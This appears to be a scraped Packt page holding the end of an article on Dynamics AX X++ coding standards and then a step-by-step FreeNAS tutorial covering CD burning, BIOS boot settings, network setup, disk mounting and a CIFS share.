avoid the situation and what action can be taken to prevent it. The value of the this variable should not be changed. The reusability should be maximized. E.g. rather than repeating lines of code at different places, a single method can be written so that changes in the method can be reflected at all the places where this method is used. There should be only one successful return point (except in switch statements) so that object deletion, etc. can be ensured. A method should perform a single well-defined task and be named according to the task performed. Text Constant Standards All the text used in Dynamics AX is supposed to be in a label file irrespective of its use e.g. user interface or error or success message. The use of text constants can be classified into two broad categories i.e. user interface text and system-oriented text. The text used in the user interface should follow the following best practices: Modify property values on the extended data types or base enums inthe application. Never create duplicate label files i.e. the same text (in the same language) but a different label file. New label files can be created when customizing the text, but it is always recommended to reuse the standard labels. However, it may offer a disadvantage—all the changes made to the SYS layer label files will be gone whenever an upgrade occurs. So the decision of customizing an existing label file or creating new label file should be taken carefully. User interface text (labels files) should be used in double quotes. System-oriented text constants must be in single quotes. Exception Handling The principle uses of exception handling include freeing system resources (e.g. memory through object deletion, closing database connection, etc.) and providing constructive information in the Infolog so that the user can prevent such erroneous conditions. The following are a few recommended best practices related to exception handling: A try or catch deadlock or retry loop should always be created around database transactions that can cause deadlocks. In the retry clause the values of transient variables should be set back to the values before try. Branching A few recommended best practices related to the if-else statement and switch statement are as follows: Always use positive logic e.g. write if (true) rather than if (! false). Prefer switch statement rather than multiple if-else statements. Always end a case with a break or return or throw statement unless a fall through mechanism is intentionally used. When a fall through mechanism is used a comment should be given like //fall through so that it is clear to every reader. Code Layout For readability of the code, code should be written in a proper layout. Some chief best practices for code layout are as follows: Remove commented code before shipping code. Follow indentation rules. Follow case rules for naming classes, methods, tables, etc. Methods Following are a few best practices for methods: Methods should be small and logical so that it can be easily overridden or over-layered. Methods should perform a single well defined task and from their name the task performed should be clear. For static class methods and table methods, qualified client, server, or client server should be used in such a way that calls to other tiers are minimized. For greater details refer to the Best Practices for Designing section in the Developer's Guide. To ensure trustworthiness, appropriate access levels (public, private, or protected) should be assigned. Methods should be named according to the Dynamics AX naming conventions; the reserved keywords such as is, check, validate, set, get, and find should be used as per the Dynamics AX way of using these standard methods or functions. All methods using such keywords must not have side effects e.g. no assignment in validate, check, get, or is methods. Parameter's names must start with an underscore (_) character besides following other generalized naming conventions. Handling Dates Dates are sources of error due to variations in date presentation formats and in values due to differences in time zone. A few best practices for handling dates are as follows: Date fields must be stored or displayed in the date field only as IntelliMorph has the ability to display the date value in a format suitable for the user provided that the date format property is chosen as Auto and it is presented in a date control. The system date should not be considered as reliable information but in some cases (e.g. validation of information input by a user) system date should be read using the SystemDateGet() function instead of the today() function. Date conversion should be avoided as it will loose date properties and hence sometimes conversion may result in wrong information. For all user interface-related situations strFmt or date2Str should be used with a value of -1 for all formatting-related parameters. This will allow users to use this information in the format specified in regional settings. Care should also be taken that string variables storing converted date information are sufficiently long. Label Standards It is highly recommended that any user-interface text is defined using labels. This will ensure many advantages during translation. A few label file standards to ensure the true benefits of the label file system are as follows: The location of label files should be the most generalized one i.e. extended data type (EDT). In some cases an existing EDT cannot be used only because of the difference in label text. In such cases a new EDT should be created by extending the existing EDT. In such cases other alternatives may also be available (e.g. label change at the field) but the rule of thumb is to use the label at the most general place. The label files should not be duplicated i.e. two label files should not exist for the same text. AOT Object Standards The AOT object standards are specific to a particular AOT element. Broadly we can classify AOT elements as follows: Data Dictionary Extended data type Base Enum Tables Feature keys Table collection Classes Forms Reports Jobs Menu items Data Dictionary This is a group of AOT objects including the items mentioned in the previous section. The best practices for tables can further be divided into best practices for the fields, field groups, indexes, table relations, delete actions, and methods. Extended Data Type The EDT plays a great role as it is the basic entity of GUI elements. The following are a few basic best practices related to extended data types. All date and date format-related properties should be set to Auto. Help text should not be same as the label property. Help text is supposed to be more descriptive and should be able to explain why and/or how. An EDT name must be a real-world name, prefixed with module (if it belongs to one module only). Base Enum The following are a few basic best practices related to Base Enum: The Enum name should be an indication of either the few possible values or type of values. For example DiscountType, OpenClose, etc. Display length property should be set to auto so that in every language the full name can be displayed. Help and label properties must have some value. Help and label properties should not have the same value. Tables Many of the best practices for tables come under the scope of performance optimization, database design standards, etc. and hence those standards have been discussed elsewhere. Some of the standards not discussed are discussed here. The table name may consist of the following valuable information: Prefix: Module name such as Cust for Account Payable, Sales for Account Receivables Infix: Logical description of the content Post fix: Type of data e.g. Trans (for transactions), Jour (Journals), Line (table containing detailed information about a particular record in header table), Table (primary main tables), Group, Parameters, Setup, or module name to which the table belongs Label is a mandatory property and tables must be labelled using Label ID only. The text value of Label ID must be unique in all languages supported. If a table belongs to one of the four types Parameter, Group, Main, or WorksheetHeader, then it must have an associated form to maintain the table records. This form should have a name identical to its display menu item (used to start this form) and like the table name. formRef is the property of a table for the name of the associated form. Title Field 1 and Title Field 2 should be mentioned: TitleField1: The key field for the records in the table. This should be a descriptive title, if the key is information for the user. TitleField2: The description for the records in the table. Fields Most of the properties for the fields are inherited from extended data types; however, it is not mandatory to use some or all inherited values for such properties. Here are a few guidelines: Name: Should be like the corresponding EDT name but if named separately, it should be logical. The fields used as key should be postfixed as ID e.g. CustId, ItemId, etc. HelpText: This is a mandatory property and inherited from the corresponding EDT. Since Help Text needs to be customized as per the different uses ofthe same EDT, Help text can be modified at any field but the following arethe guidelines: The help text property should not be same as the label property. Label is also a mandatory property, which is inherited from EDT. If a value is set here, it should be different from the value on EDT. Every field that is either the primary key or one of the key mandatory properties must be set to Yes. Before considering memo or container type fields, it should be kept in mind that they add time to application and database fetch, they inhibit array fetching, and these types of fields cannot be used in where expressions. Field Group The field group is a group of fields shown in the user interface. Dynamics AX has some standard groups (e.g. Identification, Administration, Address, Dimension, Setup, Misc, etc.), while other can be created. The fields that logically belong together can be placed in one field group while the Misc field group can be used to group fields that do not fit in any other field group. The dimension field group must have a single kind of field Dimension. The field groups should have the same kind of grouping at the database and form or reports to improve caching and hence the performance. Delete Actions The database integrity is one of the key principles in Relational Database Management System (RDBMS). The delete action should be used on every relation between two tables. The following are key best practices for delete actions. Use a delete action on every relation between two tables. Use table delete actions instead of writing code to specify whether deletes are restricted or cascaded. Dynamics AX has three types of delete actions; selection of one will solely depend upon the custom requirements. Table Methods The tables in Dynamics AX have several properties such as delete, validateDelete, etc. and hence Dynamics AX recommends that you should not write methods or X++ code to implement something that can be done just by setting property values. Dynamics AX recommends using inbuilt table methods for those custom requirements that cannot be met with table properties settings. Some of the table methods are mandatory to implement e.g. find and exists methods. Classes The classes have a peculiarity that they may have both a back end (database) and front end (GUI). The front interface should be easy to use and at the same time as secure as possible. The implementation details of the class should always be hidden from the user and hence use of private or protected methods is recommended. The back-end methods are highly secure, standardized, and reliable and hence use of private or protected methods is recommended in prescribed design patterns. The design patterns depend upon the type of class. Classes can be categorized in the following categories: Real object Action class Supporting class The following are a few common best practices related to declaration: Object member variables must only be used to hold the state of the object i.e. variables for which values should be kept between and outside instance method calls. Use of global variables must be minimized. Unused variables must be cleaned up; a tool available at Add-Ins | Best Practices | Check Variables can be used to know the unused variables. Constants used in more than one method in a class (or in subclass) should be declared during class declaration. There is a rich set of best practices for classes and the Best Practices for Microsoft Dynamics AX Development released by Microsoft would be good read. Forms The forms are in the presentation tier in any three-tier architecture system. Most of them are related to look and feel or layout. Some other best practices for forms revolve around the following characteristics: Use of Intellimorph maximally No forced date or time format No forced layout such as fixed width for label, position control for GUI controls, etc. Use of label files for GUI text Forms having minimal coding Avoid Coding on Forms The basic concept of three-tier architecture is that forms should be used only for the presentation tier and hence no other code such as business logic should be there on forms. The code placed on forms also reduces their reusability and the ease of further customization; e.g. if you want to develop an enterprise portal, the code written on forms will have to be written again in classes or table methods, etc., which will make the implementation complex. Another example may be when you want to 'COM enable' your business logic; form code related to business logic will make your life almost impossible. Any code (other than presentation logic) written on forms imposes limitation on performance as call between two different layers increase slowing the performance and hence code on forms should be avoided as much as possible. In cases where avoiding code on forms is not possible the guidelines summarized in the following table should be used for writing code on forms. Place to Write Code Guidelines Form level When code is related to whole form When code is related to multiple data sources Editor or Display methods (only those that are not related to any data source) Data source Data source-related Edit or Display methods Code related only to the data source that cannot be effectively placed in a table method Controls When it is strictly related to the controls Use of IntelliMorph Maximally Due to a user's locale or preferred format a form may be presented in a different language and/or a different date, time, or currency format. Dynamics AX best practices recommend Auto as the value for the display properties related to the following: Date Currency Time Language Number format (such as decimal operator, separator, etc.) Label size Form size The rule of thumb is to keep the various properties as Auto or default value, which will help IntelliMorph to function maximally. For further details about best practices readers are recommended to go through the Developers Guide for Best Practices. Reports The peculiar fact about the reports is that they are output media where the external environment such as paper size, user's configuration about the locale or language, font size, etc. matters. Dynamics AX recommends using 'Auto Design' to develop the report as these kinds of reports can change the layout according to external environmental variables. Another way to develop a report in Dynamics AX is 'Generated Design'; this type of design is recommended only when strict report layout is required. A few such examples may be regulatory reports, accounts reports, etc. Summary In this two part article we discussed various areas where quality could be improved by adopting best practices. We also discussed various best practices, theory behind best practices, and how to adopt these best practices, i.e. with practical tips.
Read more
  • 0
  • 0
  • 5945

article-image-installation-freenas
Packt
28 Oct 2009
28 min read
Save for later

Installation of FreeNAS

Packt
28 Oct 2009
28 min read
Downloading FreeNAS Before you can install the FreeNAS server, you will need to download the latest version from the FreeNAS website (http://www.freenas.org). Go to the download section and find the latest "LiveCD" version. The LiveCD version is what is known as an ISO image file and will have the .iso file extension. An ISO image is an exact copy of the structure and data for a CD or DVD disk. Using a CD burning program, you can create a FreeNAS bootable CD. We will look at this in more detail later on. What Hardware Do I Need? In this tutorial, we will start exploring FreeNAS, so you will need a machine on which to install the FreeNAS software. At this point in time, it doesn't have to be the final machine you are going to use as the FreeNAS server. You can use a "test" machine now and having learnt all about FreeNAS, you can build, install, and deploy a production machine (or machines) later. So, what we need now is a PC with at least 96Mb of RAM (but 128Mb or more is recommended), a bootable CD-ROM drive, a network card, one or more hard disks, and either a floppy disk drive (and a blank formatted disk) or a USB flash disk (MS-DOS formatted and empty). The hard disk will be for the data that you want to store and the floppy disk or USB flash disk will be for storing the configuration information. For the installation and initialization stages, you will also need a monitor and keyboard (but not mouse) attached to the PC. You can remove the monitor later, once FreeNAS is up and running. Warning FreeNAS boots as a LiveCD, which means that it does not use the disks on the host machine during boot up. However, when you start to configure storage on the FreeNAS server (specifically, when you format drives) all the data on the disk will be LOST. Do NOT use a machine that contains important data or an operating system that you will need afterwards. Virtualization  & VMWare The average PC runs just one operating system and inside that operating system, you would run your applications like word processing and email. There is a technology (called virtualization), which allows PCs to run more than one operating system, or to be more precise, to allow a guest virtual PC to run inside your actual PC. This virtual PC is an independent software box that can run its own OS and applications as if it were a physical computer. A virtual PC behaves exactly like a physical PC and has its own virtual CPU, RAM, hard disk, and network interface card (NIC). You can install FreeNAS on a virtual PC and FreeNAS can't tell the difference between the virtual PC and any other physical machine, also, it appears on the network just as a real PC would, running FreeNAS. There are lots of virtualization products available for Windows, Linux, and Apple OS X today. You can learn more at Wikipedia http://en.wikipedia.org/wiki/Virtualization. A very popular virtualization solution is from VMWare (http://www.vmware.com). VMWare have both commercial and freeware offerings and there are pre-configured FreeNAS images available for the VMWare range of products. This makes it an ideal environment for testing the FreeNAS server. Quick Start Guide For the Impatient If you are comfortable with burning ISO images to CDs, setting your computer's BIOS to boot from CDROM, disk partitions, and TCP/IP networking then this little guide should help you get a simple version of the FreeNAS server up and running in just a few minutes. If, however, some of these things sound daunting, then skip this section and go on to the next one where we shall go through the installation process one step at a time. For this example, we will use a USB flash disk to store the configuration information. You can use a floppy but be careful that during the boot process, the PC doesn't try to boot from the floppy before it boots from the CDROM. Burning and Booting Once you have downloaded the ISO image file from the FreeNAS website, you need to burn it to a CD. Having done that, put the CD into the PC as well as the flash disk and switch it on. Make sure that the BIOS is set to boot from CD. If it isn't, you need to enter into the BIOS and configure it to boot from CD. On many modern PCs, it is possible to select the boot device at start-up by pressing a special key (which is often either F8 or F12) to show a boot device menu. You can then select the CD as the boot device. The boot process is in four distinct parts: First, the PC will go through its POST (Power On Self Test) sequence. Here, the PC will check the amount of memory installed (which you can often see being counted on the screen) and which devices are connected (like hard drives and CDROMs). It should then start to boot from the CD. Here, FreeBSD (the underlying OS of FreeNAS) will start to boot, this is recognizable by the simple spinning wheel (made up of simple text characters like | - / and , which are animated to give the appearance of spinning). The third step is the FreeNAS boot menu. This will appear for just a few seconds and you should just let it boot normally, which is the default. The final stage is when the FreeNAS logo appears and the system will boot as FreeNAS server. You can tell when the system is fully loaded because the PC speaker will make some short but melodious beeps. To enable access to the web interface, the network of the FreeNAS server must be configured. Press the SPACE bar on the keyboard and the FreeNAS logo will disappear and a simple text menu will appear.       There are two aspects to configuring the network, first, you need to choose which network card to use and second, you need to assign it an address. If you have only one network card in your machine, then the FreeNAS server should have found it and automatically assigned it to be the LAN (Local Area Network) interface. What If My Network Card Isn't Found?This probably means that the network card in your machine isn't supported by FreeNAS or more specifically, by FreeBSD. You will need to replace the card with one supported by FreeBSD. Check the FreeBSD hardware compatibility page for more information: http://www.freebsd.org/releases/6.2R/hardware-i386.html If you see something like this: then the network has been recognized and assigned automatically by FreeNAS. The default IPv4 address for FreeNAS is 192.168.1.250, if this is good for your network, then you can just leave it unchanged. However, if you need to change it then press 2 followed by ENTER. If you want the machine to get its address from DHCP (Dynamic Host Configuration Protocol), answer yes (y) to the IPv4 DHCP question, otherwise answer no (n). If you are not using DHCP, you can now enter the desired IP address. Next, you need to enter the subnet mask. For 255.255.255.0, enter 24, for 255.255.0.0 enter 16, and for 255.0.0.0, enter 8. At this point, you can now skip the default gateway and DNS questions (by just pressing ENTER). If you do want to enter a default gateway and DNS server at this point, they will usually be the IP address of your Internet router. We won't be using IPv6 so the simplest thing to do now is just answer yes to the "Do you want to use AutoConfiguration for IPv6?" question. This will cause a small delay while FreeNAS tries (and probably fails) to get the IPv6 address but it is simpler than trying to enter the IPv6 address manually! You are now ready to access the web interface. The FreeNAS web interface can be accessed from any machine on the network with a web browser (including Windows, Linux, and OS X machines). On this client machine, type the address of the FreeNAS server with http:// in front of it into your web browser. For example: http://192.168.1.250 Configuring The first time you access the FreeNAS web interface, you will be asked for the username and password. The default username is admin and the default password is freenas. You should now be in the web interface. To configure some storage space, you need to work with "Disks". The logical order of working is that disks must be added, then formatted (if need be), then mounted. Finally, access is given to the various mounted disks by configuring different system services like CIFS and FTP.     So, to add a disk, go to Disks: Management. There is a + sign in a circle on the right-hand-side of the page (it can be easy to miss first time), click on it to add a disk. On the next page, select the disk you want to add. If you click on the drop-down menu, you should see the hard disks of the machines, the CDROM, and the USB flash disk. Dis'k Names in FreeBSD'The disk naming convention in FreeBSD is:/dev/ad0: Is the IDE/ATA Primary Master /dev/ad1 : Is the IDE/ATA Primary Slave/dev/ad2 : Is the IDE/ATA Secondary Master/dev/ad3 : Is the IDE/ATA Secondary Slave/dev/acd0 : Is the first ATA CD/DVD drive detected/dev/da0: Is the first SCSI hard drive, /dev/da1 the second and so on.USB flash disks are controlled using the SCSI driver, so they will appear as /dev/daN drives as well. Make sure ad0 is selected (which it should be by default). The rest of the page you can leave alone. Click Add to add the disk to the system. You then need to click Apply in order for the changes to take effect. You will now have a table showing you the disk you have added, including its size and a description. ApplyIn FreeNAS, the majority of steps need to be applied (which saves the configuration file to disk) by clicking the Apply button. It is normally found near the top of the page before any tables or configuration information is given. If you do not apply the changes, the interface will, on the whole, remember your changes but they will not be enacted in the system. After a reboot, unapplied changes will disappear. It is possible on some pages to make multiple operations and apply them all at the end. Next, the disk needs to be formatted. In Disks: Format, select the disk ad0 (which you just added above). Leave everything else unchanged and click Format disk. The disk will then be formatted. The low level output of the format command will be displayed in a box. It should end with Done!. Now the disk needs to be mounted. Go to Disks: Mount Point. Click on the + in the circle (which I shall refer to as the "add circle" from now on). Leave the Type as Disk and select the disk ad0 again. You need to type in a name, store is as good a name as any, but feel free to use which ever descriptive name you want to. Be DescriptiveIn setting up and configuring your FreeNAS server, you will be called upon to invent various names for mount points and share names etc. Try to be as descriptive as you can without being long winded. Temp, scratch, blob, and even zob are OK for testing, but try more meaningful names like storeage1, storage60gb or backupstorage etc. Don't use spaces in the names, instead use underline and in general, the names should be no longer than 15 characters. Although filling-in the description isn't mandatory in the web interface, it is worth using. Once you have completed the form click Add and then apply the changes. Sharing with Windows Machines Now that the disk has been added, formatted, and mounted, it is time to share it on the network and give other users the ability to read and write to it. FreeNAS supports many different types of access protocol, for this start guide, we will only look at Microsoft's CIFS protocol that primarily allows Windows machines (but also Apple OS X and Linux machines) to access the storage. In Services: CIFS/SMB, tick the enable box (in the title of the configuration data table). At this point, you can just about leave everything else as is with the exception of the workgroup name. We will be leaving the authentication method as "Anonymous" here as this is the easiest to get working and provides unrestricted read/write access to everyone. To make sure that the Windows machines are able to find the shared storage, we need to set the workgroup name, on the FreeNAS server, to be the same as the workgroup name of the Windows PC that will access the share. The default workgroup name for Windows Vista is WORKGROUP but note that the default for Window XP Home Edition was MSHOME. Now click Save and Restart. This will save the changes you have made and restart the CIFS service. Go to the Shares tab and click on add circle. Enter a name for the share. Repeating the name of the mount point is probably the safest policy, so in this case, store and also add a comment. Then click ... in the Path section. This will bring up a simple file system browser. The files you are seeing are on the FreeNAS server and NOT on your local PC. Click store and /mnt/store/ will appear in the little edit box at the click. OK it and you will be taken back to the shares page. Now /mnt/store/ has been added as the path. Leave everything else as it is and click Add and then apply the changes. So now the first hard disk of the computer is formatted, mounted, and shared to the rest of the network. Now, we will access the share from a Windows Vista machine. Testing the Share You can perform this test from any machine that supports the CIFS protocol including Windows 95/98/ME, Windows 2000/XP, Apple OS X, and Linux. Here, we are going to use Windows Vista. Open the Network and Sharing Center by clicking Network on the Start menu. When the window appears, Vista will automatically scan the network for any shared network resources. When it has finished, you will see the available machines on the network including FREENAS.     Open up the FREENAS computer and you will see store, the storage area that you configured. Double click on that and you now "inside" the FreeNAS server from within your Windows machine. Try dragging and dropping a few files in to the store area. Then try deleting them again. To access the FreeNAS server without using the Network and Sharing Center, click Start, and type freenas and then press Enter. This will bring up the shares available on the FreeNAS server directly:     Detailed Overview of Installation It is time to get your hands on a working FreeNAS server and to do that, we need to boot it up onto a PC. There are several steps to this. First, you must burn a CD of the ISO image file you have downloaded. Then, you need to boot the PC from the CD; this may involve changing your computers BIOS to make it boot from the optical drive. Then, you can configure the FreeNAS server to make some storage space available on the network. When using the LiveCD to boot FreeNAS, there are two types of storage on FreeNAS: data and configuration information. The data will be held on the hard drive of the PC, but the configuration needs to be held on a floppy disk or a USB flash disk. For this example, we will use a USB flash disk to store the configuration information. Making the FreeNAS CD To boot the PC into FreeNAS, you need a CD. The ISO image file you have downloaded contains all the information needed for the CD, but it needs to be written onto a physical CD. This process is often known as burning the CD as the laser writes to the disk by heating it and marking or scorching the surface layer. You need to use a PC with a CD-RW drive and a blank CD-R disk (I recommend using a good brand name CD-R for best results). Download the FreeNAS ISO image on to that machine. The PC with the CD writer should have some CD writing software on it (for example Roxio Easy CD or Nero). If you are familiar with the CD writing software, go ahead and burn the ISO file to the CD-R disk. If you aren't familiar with the CD writing software or it doesn't have any CD writing software, then I recommend ISO Recorder. You can download it from http://isorecorder.alexfeinman.com/isorecorder.htm.     Booting from CD Put your newly made FreeNAS CD into the CD drive of the machine on which you want to install FreeNAS, and also put the USB flash disk into a USB port. The flash disk will be used to store the configuration data. (You can also use a floppy disk. If you have both a USB flash disk and a floppy inserted, FreeNAS will save the configuration on the USB device). Now, you need to switch on the PC. When a PC starts, it goes through what is known as the Power On Self Test sequence. Here, the PC will check the amount of memory installed in the PC and find the installed hard drives. After the checks, the PC will try and boot from one of the hard drives, the CDROM, the floppy disk or even a USB flash disk. Which device the PC chooses first as its boot device can be changed by a built-in setup program. The setup program lets you modify basic system configuration settings. These settings are stored in a special battery-backed area of the computer's memory that retains the settings even when the power is switched off. During the POST sequence, there is normally a message telling you how to enter into the built-in setup program. It is normally either the DEL key or F2, on some systems it is also F10. You need to enter into the setup to check and/or change the first boot device to be the CDROM so that the computer will boot into FreeNAS. Each PC has a slightly different setup program, so you will need to search around until you find what you need. The three most popular types of setup programs (also known as BIOS Basic Input Output Program) are the Phoenix setup program, the Phoenix-Award setup program, and the AMI setup program. There are many types of BIOS setup programs and each PC manufacturer modifies the setup program for their own use. The information below is really only a "rough guide" to help you feel your way around. Your BIOS setup program may be significantly different from the examples below. The best source of information is the manual that came with your PC or your motherboard. If you don't have one, most PC manufacturers have them available for download on their websites. Phoenix BIOS If your machine has a Phoenix BIOS, then normally you need to press F2 to enter the setup program. The top of the setup program has a menu that you can navigate with the left and right arrow keys, you need to select the Boot menu.     On the Boot menu page, you can move up and down the available boot devices using the up and down arrow keys. You can expand and collapse sections with the + or signs using the ENTER key. To change the boot order, you use the + and keys. You want to make sure that the CDROM is the first device in the list. After you have changed the boot order list, you need to go to the Exit menu (by pressing the right arrow key) and select Exit Saving Changes. The PC will then reboot and after the POST, it will start to boot from the FreeNAS CD.     Phoenix-Award BIOS If your PC has a Phoenix-Award BIOS, then normally, you need to press DEL to enter the setup program. Once inside, you can the up, down, left, and right keys to navigate around the menus. Go in to Advanced BIOS Features and set the First Boot Device to be CDROM by using the + and keys. You now need to save your changes and exit. Pressing ESC will bring you back to the main menu, then select Save & Exit Setup. Often, pressing F10 will have the same effect. The PC will then reboot and if you have made the changes correctly, it will boot from the FreeNAS CD. AMI BIOS The American Megatrends, Inc (AMI) BIOS normally displays a message telling you to Hit <DEL> if you want to run setup. Once inside, it is quite different to that of the setup programs for Phoenix or Award. Here, the Tab key is used to navigate and the arrow keys are used to change values. To go from one page to the next, press the ALT+P keys. This information should also be printed at the bottom of the BIOS setup page. You need to find the variable Boot Sequence and make sure that it is set to boot from the CDROM first. First Look at FreeNAS The boot process is in 4 distinct parts. First, the PC will go through its POST (Power On Self Test) sequence. Here, the PC will check the amount of memory installed (which you can often see being counted on the screen) and which devices are connected (like hard drives and CDROMs). It should then start to boot from the CD. Here, FreeBSD (the underlying OS of FreeNAS) will start to boot, this is recognizable by the simple spinning wheel (made up of simple text characters like | - / and which are animated to give the appearance of spinning). The third step is the FreeNAS boot menu. This will appear for just five seconds and you should just let it boot normally which is the default. The final stage is when the FreeNAS logo appears and the system will boot as a FreeNAS server. You can tell when the system is fully loaded because the PC speaker will make some short but melodious beeps. Configuring the Network The majority of the configuration for FreeNAS is done via a web interface, but before you can use the web interface, the FreeNAS server needs to be configured for your network. This is done via a simple text menu system using the keyboard and monitor attached to the PC with FreeNAS running on it. You probably only need to do this once, and after that this new network information will be saved on the USB flash disk (or floppy disk) and the server will boot into this configuration every time. If you press the SPACE bar on FreeNAS machine, the FreeNAS logo will disappear and a simple menu will appear.     Here, you have a number of options including options to reboot or power off the system. The first two options are about configuring the network and they reflect the two parts to configuring the network, first you need to choose which network card to use (option 1) and second you need to assign it an address (option 2). If you have only one network card in your machine then the FreeNAS server should have found it and automatically assigned it to be the LAN (Local Area Network) interface. What If My Network Card Isn't Found?This probably means that the network card in your machine isn't supported by FreeNAS or more specifically by FreeBSD. You will need to replace the card with one supported by FreeBSD. Check the FreeBSD hardware compatibility page for more information: http://www.freebsd.org/releases/6.2R/hardware-i386.html If you see something like the following screenshot:     then the network has been recognised and assigned automatically by FreeNAS. What is a LAN IP Address? IP stands for Internet Protocol and it is the basic low level language that computers use to talk to each other on the Internet. It is also used on private networks (in the office or at home) to connect different PCs and even printers to each other. An IPv4 address is made up of 4 sets of number (0 to 255) and is expressed in what is known as dot notation (meaning that each number has a dot between it). So 192.168.1.250 is an IP address, it also happens to be the default IP address for the FreeNAS server. Like email, the postal service and telephone, each destination (email account, mailbox or handset) needs a unique way of being identified. This is what IP addresses do; they allow each piece of equipment on the network to have a unique identifier so that messages can be addressed to the right place on the network. Pronouncing IP AddressesIf you need to speak to someone about an IP address, the simplest way is to speak about each digit separately, so 192.168.1.250 isn't "one hundred and ninety two dot" but rather "one nine two dot one six eight dot one dot two five zero". There are two ways in which you can obtain an IP address for the FreeNAS server. The first is to have the address assigned automatically via the DHCP service (Dynamic Host Configuration Protocol), and the second is to assign it manually. What is DHCP?The Dynamic Host Configuration Protocol (DHCP) automates the assignment of IP addresses and other IP parameters (like subnet masks and default gateway). A computer that needs an IP address will send a request to the DHCP server and the server will reply with an IP address from a pool of addresses that have been set aside for this purpose. A DHCP server can be a PC or server (running Windows, OS X or Linux) as well as small devices like modern DSL modems and firewalls. The advantage of the DHCP method is that the IP address assignment, all happens in the background and you don't need to worry about setting it yourself. The disadvantages are that first you need to have an already configured and running DHCP server on your network; and second, DHCP assigns addresses from a pool of available addresses. This means that every time the FreeNAS server boots, it is not guaranteed to have the same address as it had previously. This isn't a problem when using the CIFS protocol, however, for accessing the web interface or using protocols like FTP, it is desirable to have a stable IP address to refer to. However, for testing the FreeNAS server and learning about how it works using a DHCP assigned address could be acceptable for now. It is actually possible to assign fixed, permanent IP address to certain pieces of hardware, including a FreeNAS server over DHCP, but that requires extra advanced configuration changes in the DHCP server that cannot be covered in this tutorial. So opting for the manual IP address, you now need to obtain two pieces of information. The first is the actual IP address for the FreeNAS and the second is what is known as the subnet mask. The subnet mask will also be expressed in the dot notation and is normally something like 255.255.255.0. If you are in an office environment, you need to speak to the network administrator and he/she will be able to give you the information you need. If you are administering your own network, you need to choose an IP that isn't currently allocated to any other machine on your network (and also, isn't part of the address pool of any DHCP server on your network). Having obtained the IP address and subnet mask, you can now configure the FreeNAS server for your network. Select option 2 on the console menu. If you have chosen to have DHCP assign the address, answer yes (y) to the first question about using DHCP for IPv4. Otherwise answer no (n). If you are setting the address manually, you can now enter the address in dot notation, i.e. 192.168.1.240. Next, comes the subnet mask. If your subnet mask is 255.255.255.0: enter 24, for 255.255.0.0: enter 16, and for 255.0.0.0: enter 8. At this point, you can now skip the default gateway and DNS questions (by just pressing ENTER). We won't be using IPv6 so the simplest thing to do now is just answer yes to the "Do you want to use AutoConfiguration for IPv6?" question. This will cause a small delay while FreeNAS tries (and probably fails) to get the IPv6 address but it is simpler than trying to enter the IPv6 address manually! After you have successful set the IP address, there will be a small message on the screen inviting you to access the web interface by opening the listed URL in your web browser. If you have used DHCP, note down the URL listed. If you set the IP address manually, check that the URL listed is the same as the IP address you set with [http:// http://] in front of it. You are now ready to access the web interface. What is IPv4 and IPv6?The Internet Protocol has been around since the mid 1980's and when it was designed, the popularity of the Internet was not envisaged. The number of computers connected to the Internet is quickly growing beyond the addressing capabilities of the original protocol. As an answer to this, a new version of the IP protocol has been designed and has been given the name IP version 6 or IPv6 for short and the older version has taken the name IP version 4 or IPv4 for short. FreeNAS supports both versions of the Internet Protocol. In this tutorial, we will concentrate just on IPv4 as it still remains the most popular of the two protocols. Basic Configuration With your FreeNAS server now being up and running, it is time to access the web interface. Open a web browser on a computer on the same network as the FreeNAS server. Enter in the URL of the FreeNAS server. This should be the same as the IP address of the server with [http:// http://] in the front. The default URL is http://192.168.1.250     The first time you access the FreeNAS web interface, you will be asked for the username and password. The default username is admin and the default password is freenas. FreeNAS Web Interface You should now have the web interface in your browser. The interface is split into two main sections. Down the left-hand-side are the menus, and the right-hand-side contains the pages for configuration. The menus are split into various sections: System, Interfaces, Disks, Services, Access, Status, Diagnostics, and Advanced.     When talking about a particular menu item, we shall use the notation Subsection: Menu Item to help you find the right menu option easily. So, the Management option, which is in the Disks subsection, will be referred to as Disks: Management. System This section is for system level configuration and operations, here for example you can change the username and password, backup and restore the configuration data, and shutdown or reboot the server. Interfaces Here, you can configure the network of the FreeNAS server much like you did via the console menu. You can change the network card that is used for the web interface and assign permanent or automatic IP addresses. Be careful when you change things here as some changes won't take effect until you reboot. If you have changed any of the addressing, you will need to access the web interface with the IP address. Disks This section of the menu is for administering the disks on the server. Here, you can set up disk redundancy (RAID), control encryption, format disks, and mount the disks on the server. Services The various access protocols like CIFS, NFS, and FTP are controlled from here. Each service is administered individually and by default NONE of the services are enabled, so before you can access files stored on the FreeNAS server, you need to enable at least one of these services. Access Most of the services offered by FreeNAS use some form of list of users to control who has access and who does not. This section is for defining these users and the groups they belong to as well as connecting the FreeNAS server to other directory services. Status The status menu has several reporting tools for you to see the current state of your FreeNAS server including a general overview, memory usage, disk usage, and network usage. You can also configure emails to be sent periodically about the status of the server. Diagnostics The diagnostics menu contains different tools to help diagnose any problem with the FreeNAS server, including logs of all the important services and diagnostic information from the hard disks and other system modules. Advanced The advanced section provides some simple tools for executing commands at the operating system level and should not be used by those unfamiliar with FreeBSD.    
Read more
  • 0
  • 0
  • 5940